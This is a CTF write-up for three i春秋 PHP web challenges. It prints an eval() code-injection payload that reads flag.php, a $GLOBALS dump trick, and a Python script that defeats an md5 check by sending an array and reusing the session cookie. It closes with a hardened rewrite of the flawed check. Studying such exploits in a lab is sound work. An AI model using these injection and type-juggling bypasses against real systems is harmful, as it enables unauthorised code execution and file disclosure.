i春秋 CTF web

爆破-1 (Brute force 1)

Use the $GLOBALS superglobal:
?hello=GLOBALS

爆破-2 (Brute force 2)

Command injection through eval():
?hello=);show_source('flag.php');//

The server evaluates
eval("var_dump($a);");
and with the payload substituted for $a this becomes
eval("var_dump();show_source('flag.php');//);");
so the trailing `);` is commented out and flag.php is printed.

爆破-3 (Brute force 3)

Goal:
$_SESSION['nums']>=10
Condition:
if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;
}

md5() returns 0 when its argument is an array, so sending value[] as an array makes the substr(...)==0 check pass.
Parameters of the first request: value[]=e&value[]=a

import requests

base = 'http://82991386f7a64ea09ecc9545b8ac8bc0c42e0a4155474630.game.ichunqiu.com'

# First request with the parameters given above: value[] is sent as an array, so the md5() check passes.
r = requests.get(base + '?value[]=e&value[]=a')
cookies = {'PHPSESSID': r.cookies['PHPSESSID']}  # get the session id and reuse it so nums accumulates
for i in range(11):
    # the response body holds the next whoami value; send its two characters as the two array elements
    url = base + '?value[]={0}&value[]={1}'.format(r.text[0:1], r.text[1:2])
    print(url)
    r = requests.get(url, cookies=cookies)
    if i == 10:
        print(r.text)  # after the 11th request nums >= 10 and the response carries the flag
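
As an added example (not from the writeup or the challenge), the same 爆破-3 condition rewritten so that neither the array trick nor loose comparison gets past it; $_SESSION['whoami'] and $_SESSION['nums'] are the page's, the function name is mine, and reading `== 0` as "the four hex digits are 0000" is an assumption about the challenge's intent.

```php
<?php
// Added example, not code from the writeup. Hardened form of the 爆破-3 check.
// Assumption: `substr(md5($value),5,4)==0` was meant as "the four hex digits
// are 0000"; the original loose check is far weaker than that.
session_start();

/*
 * Original condition from the challenge:
 *   if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0)
 * Why it is bypassable:
 *   - value[] can be submitted as an array; md5() then yields no hash (NULL plus
 *     a warning on PHP 5/7) and substr() of that compares equal to 0 under ==.
 *   - even for a string, == against the int 0 is a loose comparison, so on
 *     PHP 5/7 a non-numeric substring such as "a1f3" also compares equal to 0.
 */

function checkValueHardened($value, string $expectedWhoami): bool
{
    // Only a plain string may reach md5()/substr(); arrays, null and ints are rejected.
    if (!is_string($value) || strlen($value) < 2) {
        return false;
    }
    // Strict comparisons only: no int/string juggling, no NULL/false/"" collapsing to 0.
    $nameOk = hash_equals($expectedWhoami, substr($value, 0, 2));
    $hashOk = substr(md5($value), 5, 4) === '0000';
    return $nameOk && $hashOk;
}

$expected = (string) ($_SESSION['whoami'] ?? '');
if (checkValueHardened($_GET['value'] ?? null, $expected)) {
    $_SESSION['nums'] = ($_SESSION['nums'] ?? 0) + 1;
} else {
    $_SESSION['nums'] = 0; // a failed attempt resets the counter (my addition)
}
```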
